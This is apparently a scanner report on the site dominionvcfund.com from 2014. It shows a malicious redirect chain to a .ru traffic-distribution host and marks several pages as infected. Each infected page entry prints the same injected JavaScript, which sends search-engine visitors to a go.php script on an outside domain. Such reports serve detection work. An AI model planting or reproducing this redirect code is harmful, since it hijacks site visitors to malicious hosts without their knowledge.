Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://dominionvcfund.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: dominionvcfund.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 19 Apr 2014 10:06:05 GMT Location: http://goo.gl/gpWMY Server: Apache Content-Length: 271 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://goo.gl/gpWMY (imitation of visitor from search engine) GET /gpWMY HTTP/1.1 Host: goo.gl Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Sat, 19 Apr 2014 10:03:33 GMT Pragma: no-cache Age: 152 Location: http://mytds.s33.webhost1.ru/go.php?sid=1 Server: GSE Content-Type: text/html; charset=UTF-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Alternate-Protocol: 80:quic X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | malicious |
Scanned pages/files
| Request | Server response | Status |
http://dominionvcfund.com/ | 200 OK Content-Length: 14582 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://dominionvcfund.com/modules/mod_djimageslider/assets/slider.js | 200 OK Content-Length: 11866 Content-Type: application/javascript | clean |
http://dominionvcfund.com/templates/g8/js/imagepreloader.js | 200 OK Content-Length: 169 Content-Type: application/javascript | clean |
http://dominionvcfund.com/administrator/components/com_admin/parsejavascript.php | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://dominionvcfund.com/index.php?option=com_content&view=article&id=85&Itemid=53 | 200 OK Content-Length: 21168 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/index.php?option=com_content&view=article&id=48&Itemid=54 | 200 OK Content-Length: 14677 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/index.php?option=com_content&view=article&id=49&Itemid=55 | 200 OK Content-Length: 13883 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/index.php?option=com_content&view=article&id=50&Itemid=56 | 200 OK Content-Length: 13790 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/index.php?option=com_content&view=article&id=54&Itemid=133 | 200 OK Content-Length: 13324 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/index.php?option=com_content&view=article&id=52&Itemid=58 | 200 OK Content-Length: 14786 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/index.php?option=com_content&view=article&id=53&Itemid=59 | 200 OK Content-Length: 13043 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://www.wojianfei.net/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0]; Antivirus reports:
| ||
http://dominionvcfund.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dominionvcfund.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dominionvcfund.com/
Result: dominionvcfund.com is not infected or malware details are not published yet.
Result: dominionvcfund.com is not infected or malware details are not published yet.